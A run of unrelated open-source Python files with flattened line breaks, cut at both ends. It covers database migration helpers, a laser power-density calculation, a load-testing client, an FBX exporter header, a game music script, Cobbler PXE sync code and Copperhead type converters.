Table(table_name + "__tmp__", meta, *(columns + constraints)) new_table.create() indexes = [] for index in insp.get_indexes(table_name): column_names = [new_table.c[c] for c in index['column_names']] indexes.append(Index(index["name"], *column_names, unique=index["unique"])) c_select = [] for c in table.c: if c.name != "deleted": c_select.append(c) else: c_select.append(table.c.deleted == table.c.id) ins = InsertFromSelect(new_table, select(c_select)) migrate_engine.execute(ins) table.drop() [index.create(migrate_engine) for index in indexes] new_table.rename(table_name) new_table.update().\ where(new_table.c.deleted == new_table.c.id).\ values(deleted=True).\ execute() def change_deleted_column_type_to_id_type(migrate_engine, table_name, **col_name_col_instance): if migrate_engine.name == "sqlite": return _change_deleted_column_type_to_id_type_sqlite( migrate_engine, table_name, **col_name_col_instance) insp = reflection.Inspector.from_engine(migrate_engine) indexes = insp.get_indexes(table_name) table = get_table(migrate_engine, table_name) new_deleted = Column('new_deleted', table.c.id.type, default=_get_default_deleted_value(table)) new_deleted.create(table, populate_default=True) deleted = True # workaround for pyflakes table.update().\ where(table.c.deleted == deleted).\ values(new_deleted=table.c.id).\ execute() table.c.deleted.drop() table.c.new_deleted.alter(name="deleted") _restore_indexes_on_deleted_columns(migrate_engine, table_name, indexes) def _change_deleted_column_type_to_id_type_sqlite(migrate_engine, table_name, **col_name_col_instance): # NOTE(boris-42): sqlaclhemy-migrate can't drop column with check # constraints in sqlite DB and our `deleted` column has # 2 check constraints. So there is only one way to remove # these constraints: # 1) Create new table with the same columns, constraints # and indexes. (except deleted column). # 2) Copy all data from old to new table. # 3) Drop old table. # 4) Rename new table to old table name. insp = reflection.Inspector.from_engine(migrate_engine) meta = MetaData(bind=migrate_engine) table = Table(table_name, meta, autoload=True) default_deleted_value = _get_default_deleted_value(table) columns = [] for column in table.columns: column_copy = None if column.name != "deleted": if isinstance(column.type, NullType): column_copy = _get_not_supported_column(col_name_col_instance, column.name) else: column_copy = column.copy() else: column_copy = Column('deleted', table.c.id.type, default=default_deleted_value) columns.append(column_copy) def is_deleted_column_constraint(constraint): # NOTE(boris-42): There is no other way to check is CheckConstraint # associated with deleted column. if not isinstance(constraint, CheckConstraint): return False sqltext = str(constraint.sqltext) return (sqltext.endswith("deleted in (0, 1)") or sqltext.endswith("deleted IN (:deleted_1, :deleted_2)")) constraints = [] for constraint in table.constraints: if not is_deleted_column_constraint(constraint): constraints.append(constraint.copy()) new_table = Table(table_name + "__tmp__", meta, *(columns + constraints)) new_table.create() indexes = [] for index in insp.get_indexes(table_name): column_names = [new_table.c[c] for c in index['column_names']] indexes.append(Index(index["name"], *column_names, unique=index["unique"])) ins = InsertFromSelect(new_table, table.select()) migrate_engine.execute(ins) table.drop() [index.create(migrate_engine) for index in indexes] new_table.rename(table_name) deleted = True # workaround for pyflakes new_table.update().\ where(new_table.c.deleted == deleted).\ values(deleted=new_table.c.id).\ execute() # NOTE(boris-42): Fix value of deleted column: False -> "" or 0. deleted = False # workaround for pyflakes new_table.update().\ where(new_table.c.deleted == deleted).\ values(deleted=default_deleted_value).\ execute()
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Created on Wed Nov 8 08:46:10 2017 @author: thanasi """ import numpy as np from pint import UnitRegistry ureg = UnitRegistry() Q = ureg.Quantity # %% # pulse energy #e0 = Q(250, "mJ") e0 = (Q(1,"mJ") * 8.1596 + Q(0.375,"mJ")) * 0.055 # pulse duration tau = Q(4, "ns") # peak power # conservative estimate, assuming gaussian temporal profile peak_pow = 2 * (e0 / tau).to("W") # beam diameter d0 = Q(7, "mm") # beam area A = (np.pi * d0**2 / 4).to("cm^2") energy_density = (e0 / A).to("J/cm^2") peak_pow_dens = (peak_pow / A).to("MW/cm^2") print("-"*33) print("E-Density: {:0.3g~}".format(energy_density)) print("P-Density: {:0.1f~}".format(peak_pow_dens)) print("-"*33) # %% # check necessary extinction for photodetector # Thorlabs DET025A # power damage threshold p_dam_thresh = Q(18, "mW") # energy damage threshold, given beam properties above e_dam_thresh = (p_dam_thresh*tau/2).to("mJ") # detector active area det_area = Q(250, "um")**2 # maximum allowable power density max_det_pow_dens = p_dam_thresh / det_area # reduction factor needed from laser beam red = (peak_pow_dens / max_det_pow_dens).to("").magnitude red_OD = np.ceil(np.log10(red)) print("-"*33) print("Max Peak Power: {:1.2g}".format(p_dam_thresh)) print("Max Beam Energy: {:1.2g}".format(e_dam_thresh)) print("Power Reduction Needed: {:1.2g}".format(red)) print("OD Needed: {:2.0f}".format(red_OD)) print("-"*33)
import sys import argparse import os import json import requests from loadsbroker import logger from loadsbroker.util import set_logger def _parse(sysargs=None): if sysargs is None: sysargs = sys.argv[1:] parser = argparse.ArgumentParser(description='Runs a Loads client.') parser.add_argument('--scheme', help='Server Scheme', type=str, default='http') parser.add_argument('--host', help='Server Host', type=str, default='localhost') parser.add_argument('--port', help='Server Port', type=int, default=8080) parser.add_argument('--debug', help='Debug Info.', action='store_true', default=True) subparsers = parser.add_subparsers(help='sub-command help') for cmd_name, cmd in sorted(_COMMANDS.items()): sub = subparsers.add_parser(cmd_name, help=cmd.__doc__.strip()) for argument, options in cmd.arguments.items(): sub.add_argument(argument, **options) sub.set_defaults(func=cmd) args = parser.parse_args(sysargs) return args, parser _COMMANDS = {} def load_commands(): for file in os.listdir(os.path.dirname(__file__)): if file.startswith('cmd_') and file.endswith('.py'): mod = 'loadsbroker.client.' + file[:-len('.py')] mod = __import__(mod, globals(), locals(), ['cmd'], 0) _COMMANDS[mod.cmd.name] = mod.cmd load_commands() class Client(object): def __init__(self, host='localhost', port=8080, scheme='http'): self.port = port self.host = host self.scheme = scheme self.root = '%s://%s:%d/api' % (scheme, host, port) self.session = requests.Session() def __call__(self, command, **options): cmd = _COMMANDS[command] return cmd(self.session, self.root)(**options) def main(sysargs=None): args, parser = _parse(sysargs) set_logger(debug=args.debug) c = Client(args.host, args.port, args.scheme) if not hasattr(args, 'func'): args.func = _COMMANDS['info'] args.func = args.func(c.session, c.root) try: res = args.func(args) print(json.dumps(res)) except requests.exceptions.ConnectionError as e: logger.debug('Cannot connect => ' + str(e)) if __name__ == '__main__': main()
#!/usr/bin/python2.7 # -*- coding: utf-8 -*- """ **Project Name:** MakeHuman **Product Home Page:** http://www.makehuman.org/ **Code Home Page:** https://bitbucket.org/MakeHuman/makehuman/ **Authors:** Thomas Larsson, Jonas Hauquier **Copyright(c):** MakeHuman Team 2001-2014 **Licensing:** AGPL3 (http://www.makehuman.org/doc/node/the_makehuman_application.html) This file is part of MakeHuman (www.makehuman.org). This program is free software: you can redistribute it and/or modify it under the terms of the GNU Affero General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more details. You should have received a copy of the GNU Affero General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. **Coding Standards:** See http://www.makehuman.org/node/165 Abstract -------- Fbx headers """ from . import fbx_skeleton from . import fbx_mesh from . import fbx_deformer from . import fbx_material from . import fbx_anim def writeHeader(fp, filepath, config): import datetime today = datetime.datetime.now() id = 39112896 if config.binary: from . import fbx_binary import os root = fp fbx_binary.fbx_header_elements(root, config, today) name = os.path.splitext(os.path.basename(filepath))[0] fbx_binary.fbx_documents_elements(root, name, id) fbx_binary.fbx_references_elements(root) return import fbx_utils mesh_orientation = fbx_utils.getMeshOrientation(config) up_axis, front_axis, coord_axis = fbx_utils.RIGHT_HAND_AXES[mesh_orientation] fp.write("""; FBX 7.3.0 project file ; Exported from MakeHuman TM (www.makehuman.org) ; ---------------------------------------------------- FBXHeaderExtension: { FBXHeaderVersion: 1003 FBXVersion: 7300 """ + """ CreationTimeStamp: { Version: 1000 Year: %d Month: %d Day: %d Hour: %d Minute: %d Second: %d Millisecond: %d } """ % (int(today.strftime('%Y')), int(today.strftime('%m')), int(today.strftime('%d')), int(today.strftime('%H')), int(today.strftime('%M')), int(today.strftime('%S')), int(float(today.strftime('%f'))/1000)) + """ Creator: "FBX SDK/FBX Plugins version 2013.3" SceneInfo: "SceneInfo::GlobalInfo", "UserData" { Type: "UserData" Version: 100 MetaData: { Version: 100 Title: "" Subject: "" Author: "www.makehuman.org" Keywords: "" Revision: "" Comment: "" } Properties70: { """ + ' P: "DocumentUrl", "KString", "Url", "", "%s"\n' % filepath + ' P: "SrcDocumentUrl", "KString", "Url", "", "%s"\n' % filepath + """ P: "Original", "Compound", "", "" P: "Original|ApplicationVendor", "KString", "", "", "" P: "Original|ApplicationName", "KString", "", "", "" P: "Original|ApplicationVersion", "KString", "", "", "" P: "Original|DateTime_GMT", "DateTime", "", "", "" P: "Original|FileName", "KString", "", "", "" P: "LastSaved", "Compound", "", "" P: "LastSaved|ApplicationVendor", "KString", "", "", "" P: "LastSaved|ApplicationName", "KString", "", "", "" P: "LastSaved|ApplicationVersion", "KString", "", "", "" P: "LastSaved|DateTime_GMT", "DateTime", "", "", "" } } } GlobalSettings: { Version: 1000 Properties70: { P: "UpAxis", "int", "Integer", "",%s P: "UpAxisSign", "int", "Integer", "",%s P: "FrontAxis", "int", "Integer", "",%s P: "FrontAxisSign", "int", "Integer", "",%s P: "CoordAxis", "int", "Integer", "",%s P: "CoordAxisSign", "int", "Integer", "",%s P: "OriginalUpAxis", "int", "Integer", "",-1 P: "OriginalUpAxisSign", "int", "Integer", "",1 P: "UnitScaleFactor", "double", "Number", "",10 P: "OriginalUnitScaleFactor", "double", "Number", "",1 P: "AmbientColor", "ColorRGB", "Color", "",0,0,0 P: "DefaultCamera", "KString", "", "", "Producer Perspective" P: "TimeMode", "enum", "", "",0 P: "TimeSpanStart", "KTime", "Time", "",0 P: "TimeSpanStop", "KTime", "Time", "",46186158000 P: "CustomFrameRate", "double", "Number", "",-1 } }""" % (up_axis[0], up_axis[0], front_axis[0], front_axis[1], coord_axis[0], coord_axis[1]) + """ ; Documents Description ;------------------------------------------------------------------ Documents: { Count: 1 Document: %s, "Scene", "Scene" {""" % id + """ Properties70: { P: "SourceObject", "object", "", "" P: "ActiveAnimStackName", "KString", "", "", "" P: "COLLADA_ID", "KString", "", "", "Scene" } RootNode: 0 } } ; Document References ;------------------------------------------------------------------ References: { } """) def writeObjectDefs(fp, meshes, skel, action, config): count = ( fbx_skeleton.countObjects(skel) + fbx_mesh.countObjects(meshes) + fbx_deformer.countObjects(meshes, skel) + 1 ) if config.useMaterials: count += fbx_material.countObjects(meshes) if action: count += fbx_anim.countObjects(action) if config.binary: from . import fbx_binary fbx_binary.fbx_definitions_elements(fp, count) return fp.write( """ ; Object definitions ;------------------------------------------------------------------ Definitions: { Version: 100 """ + ' Count: %d' % count + """ ObjectType: "GlobalSettings" { Count: 1 } """) def writeObjectProps(fp, config): if config.binary: from . import fbx_binary objects = fbx_binary.elem_empty(fp, b"Objects") return fp.write( """ ; Object properties ;------------------------------------------------------------------ Objects: { """) def writeLinks(fp, config): if config.binary: from . import fbx_binary fbx_binary.fbx_connections_element(fp) return fp.write( """ ; Object connections ;------------------------------------------------------------------ Connections: { """)
# -*- coding: utf-8 -*- """ *==LICENSE==* CyanWorlds.com Engine - MMOG client, server and tools Copyright (C) 2011 Cyan Worlds, Inc. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. Additional permissions under GNU GPL version 3 section 7 If you modify this Program, or any covered work, by linking or combining it with any of RAD Game Tools Bink SDK, Autodesk 3ds Max SDK, NVIDIA PhysX SDK, Microsoft DirectX SDK, OpenSSL library, Independent JPEG Group JPEG library, Microsoft Windows Media SDK, or Apple QuickTime SDK (or a modified version of those libraries), containing parts covered by the terms of the Bink SDK EULA, 3ds Max EULA, PhysX SDK EULA, DirectX SDK EULA, OpenSSL and SSLeay licenses, IJG JPEG Library README, Windows Media SDK EULA, or QuickTime SDK EULA, the licensors of this Program grant you additional permission to convey the resulting work. Corresponding Source for a non-source form of such a combination shall include the source code for the parts of OpenSSL and IJG JPEG Library used as well as that of the covered work. You can contact Cyan Worlds, Inc. by email [email protected] or by snail mail at: Cyan Worlds, Inc. 14617 N Newport Hwy Mead, WA 99021 *==LICENSE==* """ """ Module: clftIntroMusic.py Age: Cleft Date: October 2006 Author: Tye Hooley Controls the Intro Music """ from Plasma import * from PlasmaTypes import * actStartMusic01 = ptAttribActivator(1,"Start Music Activator 01") actStartMusic02 = ptAttribActivator(2,"Start Music Activator 02") actStartMusic03 = ptAttribActivator(3,"Start Music Activator 03") respStartMusic = ptAttribResponder(4,"Start Music Repsonder") respStartRandomMusic = ptAttribResponder(5,"Start Random Music Responder") actStopMusic = ptAttribActivator(6,"Stop Music Activator") respStopInitialMusic = ptAttribResponder(7,"Stop Initial Music Responder") respStopRandomMusic = ptAttribResponder(8,"Stop Random Music Responder") # globals #Music States kOff = 0 kInitialPlay = 1 kRandomPlay = 2 musicState = kOff class clftIntroMusic(ptResponder): def __init__(self): global musicState ptResponder.__init__(self) self.id = 5249 self.version = 1 def OnNotify(self,state,id,events): global musicState if state == false: return #print "clftIntroMusic: We've got notification from ID #:%s" %id #-----Activators----- startMusicActIDs = (actStartMusic01.id, actStartMusic02.id, actStartMusic03.id) if id in startMusicActIDs: if musicState == kOff: print "clftIntroMusic: ---Starting Music---" musicState = kInitialPlay respStartMusic.run(self.key) return elif id == actStopMusic.id: if musicState == kInitialPlay: print "clftIntroMusic: ###Stopping Music###" respStopInitialMusic.run(self.key) elif musicState == kRandomPlay: print "clftIntroMusic: ###Stopping Music###" respStopRandomMusic.run(self.key) musicState = kOff return #-----Responders----- elif id == respStartMusic.id: if musicState == kInitialPlay: print "clftIntroMusic: ___Randomly Starting Music___" musicState = kRandomPlay respStartRandomMusic.run(self.key) return
""" Running small pieces of cobbler sync when certain actions are taken, such that we don't need a time consuming sync when adding new systems if nothing has changed for systems that have already been created. Copyright 2006-2009, Red Hat, Inc and Others Michael DeHaan <michael.dehaan AT gmail> This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA """ import os import os.path import clogger import module_loader import utils class CobblerLiteSync: """ Handles conversion of internal state to the tftpboot tree layout """ def __init__(self, collection_mgr, verbose=False, logger=None): """ Constructor """ self.verbose = verbose self.collection_mgr = collection_mgr self.distros = collection_mgr.distros() self.profiles = collection_mgr.profiles() self.systems = collection_mgr.systems() self.images = collection_mgr.images() self.settings = collection_mgr.settings() self.repos = collection_mgr.repos() if logger is None: logger = clogger.Logger() self.logger = logger self.tftpd = module_loader.get_module_from_file("tftpd", "module", "in_tftpd").get_manager(collection_mgr, logger) self.sync = collection_mgr.api.get_sync(verbose, logger=self.logger) self.sync.make_tftpboot() def add_single_distro(self, name): # get the distro record distro = self.distros.find(name=name) if distro is None: return # copy image files to images/$name in webdir & tftpboot: self.sync.tftpgen.copy_single_distro_files(distro, self.settings.webdir, True) self.tftpd.add_single_distro(distro) # create the symlink for this distro src_dir = utils.find_distro_path(self.settings, distro) dst_dir = os.path.join(self.settings.webdir, "links", name) if os.path.exists(dst_dir): self.logger.warning("skipping symlink, destination (%s) exists" % dst_dir) elif utils.path_tail(os.path.join(self.settings.webdir, "distro_mirror"), src_dir) == "": self.logger.warning("skipping symlink, the source (%s) is not in %s" % (src_dir, os.path.join(self.settings.webdir, "distro_mirror"))) else: try: self.logger.info("trying symlink %s -> %s" % (src_dir, dst_dir)) os.symlink(src_dir, dst_dir) except (IOError, OSError): self.logger.error("symlink failed (%s -> %s)" % (src_dir, dst_dir)) # generate any templates listed in the distro self.sync.tftpgen.write_templates(distro, write_file=True) # cascade sync kids = distro.get_children() for k in kids: self.add_single_profile(k.name, rebuild_menu=False) self.sync.tftpgen.make_pxe_menu() def add_single_image(self, name): image = self.images.find(name=name) self.sync.tftpgen.copy_single_image_files(image) kids = image.get_children() for k in kids: self.add_single_system(k.name) self.sync.tftpgen.make_pxe_menu() def remove_single_distro(self, name): bootloc = utils.tftpboot_location() # delete contents of images/$name directory in webdir utils.rmtree(os.path.join(self.settings.webdir, "images", name)) # delete contents of images/$name in tftpboot utils.rmtree(os.path.join(bootloc, "images", name)) # delete potential symlink to tree in webdir/links utils.rmfile(os.path.join(self.settings.webdir, "links", name)) def remove_single_image(self, name): bootloc = utils.tftpboot_location() utils.rmfile(os.path.join(bootloc, "images2", name)) def add_single_profile(self, name, rebuild_menu=True): # get the profile object: profile = self.profiles.find(name=name) if profile is None: # most likely a subprofile's kid has been # removed already, though the object tree has # not been reloaded ... and this is just noise. return # rebuild the yum configuration files for any attached repos # generate any templates listed in the distro self.sync.tftpgen.write_templates(profile) # cascade sync kids = profile.get_children() for k in kids: if k.COLLECTION_TYPE == "profile": self.add_single_profile(k.name, rebuild_menu=False) else: self.add_single_system(k.name) if rebuild_menu: self.sync.tftpgen.make_pxe_menu() return True def remove_single_profile(self, name, rebuild_menu=True): # delete profiles/$name file in webdir utils.rmfile(os.path.join(self.settings.webdir, "profiles", name)) # delete contents on autoinstalls/$name directory in webdir utils.rmtree(os.path.join(self.settings.webdir, "autoinstalls", name)) if rebuild_menu: self.sync.tftpgen.make_pxe_menu() def update_system_netboot_status(self, name): self.tftpd.update_netboot(name) def add_single_system(self, name): # get the system object: system = self.systems.find(name=name) if system is None: return # rebuild system_list file in webdir if self.settings.manage_dhcp: self.sync.dhcp.regen_ethers() if self.settings.manage_dns: self.sync.dns.regen_hosts() # write the PXE files for the system self.tftpd.add_single_system(system) def remove_single_system(self, name): bootloc = utils.tftpboot_location() system_record = self.systems.find(name=name) # delete contents of autoinsts_sys/$name in webdir system_record = self.systems.find(name=name) for (name, interface) in system_record.interfaces.iteritems(): filename = utils.get_config_filename(system_record, interface=name) utils.rmfile(os.path.join(bootloc, "pxelinux.cfg", filename)) utils.rmfile(os.path.join(bootloc, "grub", filename.upper()))
# # Copyright 2012 NVIDIA Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # import backendtypes as ET import coretypes as T import backendsyntax as ES import coresyntax as S def back_to_front_type(x): concrete = ET.unvariate(x) if isinstance(concrete, ET.Sequence): sub = back_to_front_type(concrete.sub()) return T.Seq(sub) elif isinstance(concrete, ET.Tuple): return T.Tuple(*[back_to_front_type(y) for y in concrete]) elif isinstance(concrete, ET.Monotype): name = str(x) if name == 'Int32': return T.Int elif name == 'Int64': return T.Long elif name == 'Bool': return T.Bool elif name == 'Float32': return T.Float elif name == 'Float64': return T.Double else: raise ValueError("Unknown monotype %s" % name) else: raise ValueError("Unknown type") def front_to_back_type(x): if isinstance(x, T.Polytype): variables = [ET.Monotype(str(y)) for y in x.variables] sub = front_to_back_type(x.monotype()) return ET.Polytype(variables, sub) elif isinstance(x, T.Tuple): subs = [front_to_back_type(y) for y in x.parameters] return ET.Tuple(*subs) elif isinstance(x, T.Fn): args = front_to_back_type(x.parameters[0]) result = front_to_back_type(x.parameters[1]) return ET.Fn(args, result) elif isinstance(x, T.Seq): sub = front_to_back_type(x.unbox()) return ET.Sequence(sub) elif isinstance(x, T.Monotype): if str(x) == str(T.Int): return ET.Int32 elif str(x) == str(T.Long): return ET.Int64 elif str(x) == str(T.Float): return ET.Float32 elif str(x) == str(T.Double): return ET.Float64 elif str(x) == str(T.Bool): return ET.Bool elif str(x) == str(T.Void): return ET.Void elif isinstance(x, str): return ET.Monotype(str(x)) raise ValueError("Can't convert %s to backendtypes" % str(x)) def front_to_back_node(x): if isinstance(x, list): subs = [front_to_back_node(y) for y in x] return ES.Suite(subs) elif isinstance(x, S.Name): name = ES.Name(x.id, front_to_back_type(x.type)) return name elif isinstance(x, S.Number): literal = ES.Literal(str(x), front_to_back_type(x.type)) return literal elif isinstance(x, S.Tuple): subs = [front_to_back_node(y) for y in x] tup = ES.Tuple(subs, front_to_back_type(x.type)) return tup elif isinstance(x, S.Apply): fn = front_to_back_node(x.function()) args = [front_to_back_node(y) for y in x.arguments()] arg_types = [front_to_back_type(y.type) for y in x.arguments()] appl = ES.Apply(fn, ES.Tuple(args, ET.Tuple(arg_types))) return appl elif isinstance(x, S.Bind): lhs = front_to_back_node(x.binder()) rhs = front_to_back_node(x.value()) return ES.Bind(lhs, rhs) elif isinstance(x, S.Return): val = front_to_back_node(x.value()) return ES.Return(val) elif isinstance(x, S.Cond): test = front_to_back_node(x.test()) body = front_to_back_node(x.body()) orelse = front_to_back_node(x.orelse()) return ES.Cond(test, body, orelse) elif isinstance(x, S.Lambda): args = [front_to_back_node(y) for y in x.formals()] body = front_to_back_node(x.body()) lamb = ES.Lambda(ES.Tuple(args), body, front_to_back_type(x.type)) return lamb elif isinstance(x, S.Closure): closed_over = [front_to_back_node(y) for y in x.closed_over()] closed_over_types = [front_to_back_type(y.type) for y in x.closed_over()] body = front_to_back_node(x.body()) closure = ES.Closure(ES.Tuple(closed_over, ET.Tuple(closed_over_types)), body, front_to_back_type(x.type)) return closure elif isinstance(x, S.Procedure): name = front_to_back_node(x.name()) formals = [front_to_back_node(y) for y in x.formals()] formal_types = [front_to_back_type(y.type) for y in x.formals()] body = front_to_back_node(x.body()) proc = ES.Procedure(name, ES.Tuple(formals, ET.Tuple(formal_types)), body, front_to_back_type(x.name().type)) return proc elif isinstance(x, S.Subscript): base = front_to_back_node(x.value()) sl = front_to_back_node(x.slice()) return ES.Subscript(base, sl, front_to_back_type(x.type))
# -*- coding: utf-8 -*- import datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Changing field 'ProductVariation.sku' db.alter_column('shop_productvariation', 'sku', self.gf('cartridge.shop.fields.SKUField')(max_length=20, unique=True, null=True)) # Adding field 'Product.num_in_stock' db.add_column('shop_product', 'num_in_stock', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True), keep_default=False) def backwards(self, orm): # User chose to not deal with backwards NULL issues for 'ProductVariation.sku' raise RuntimeError("Cannot reverse this migration. 'ProductVariation.sku' and its values cannot be restored.") # Deleting field 'Product.num_in_stock' db.delete_column('shop_product', 'num_in_stock') models = { 'contenttypes.contenttype': { 'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"}, 'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}) }, 'generic.assignedkeyword': { 'Meta': {'ordering': "('_order',)", 'object_name': 'AssignedKeyword'}, '_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}), 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'keyword': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'assignments'", 'to': "orm['generic.Keyword']"}), 'object_pk': ('django.db.models.fields.IntegerField', [], {}) }, 'generic.keyword': { 'Meta': {'object_name': 'Keyword'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}), 'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}) }, 'generic.rating': { 'Meta': {'object_name': 'Rating'}, 'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'object_pk': ('django.db.models.fields.IntegerField', [], {}), 'value': ('django.db.models.fields.IntegerField', [], {}) }, 'pages.page': { 'Meta': {'ordering': "('titles',)", 'object_name': 'Page'}, '_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}), 'content_model': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'in_footer': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'in_navigation': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': "orm['generic.AssignedKeyword']"}), 'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}), 'login_required': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['pages.Page']"}), 'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}), 'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}), 'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}), 'titles': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}) }, 'shop.cart': { 'Meta': {'object_name': 'Cart'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'last_updated': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}) }, 'shop.cartitem': { 'Meta': {'object_name': 'CartItem'}, 'cart': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['shop.Cart']"}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}), 'quantity': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'sku': ('cartridge.shop.fields.SKUField', [], {'max_length': '20'}), 'total_price': ('cartridge.shop.fields.MoneyField', [], {'default': "'0'", 'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'unit_price': ('cartridge.shop.fields.MoneyField', [], {'default': "'0'", 'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'url': ('django.db.models.fields.CharField', [], {'max_length': '200'}) }, 'shop.category': { 'Meta': {'ordering': "('_order',)", 'object_name': 'Category', '_ormbases': ['pages.Page']}, 'combined': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'content': ('mezzanine.core.fields.RichTextField', [], {}), 'options': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'product_options'", 'blank': 'True', 'to': "orm['shop.ProductOption']"}), 'page_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['pages.Page']", 'unique': 'True', 'primary_key': 'True'}), 'price_max': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'price_min': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['shop.Product']", 'symmetrical': 'False', 'blank': 'True'}), 'sale': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.Sale']", 'null': 'True', 'blank': 'True'}) }, 'shop.discountcode': { 'Meta': {'object_name': 'DiscountCode'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'discountcode_related'", 'blank': 'True', 'to': "orm['shop.Category']"}), 'code': ('cartridge.shop.fields.DiscountCodeField', [], {'unique': 'True', 'max_length': '20'}), 'discount_deduct': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'discount_exact': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'discount_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '4', 'decimal_places': '2', 'blank': 'True'}), 'free_shipping': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'min_purchase': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['shop.Product']", 'symmetrical': 'False', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'uses_remaining': 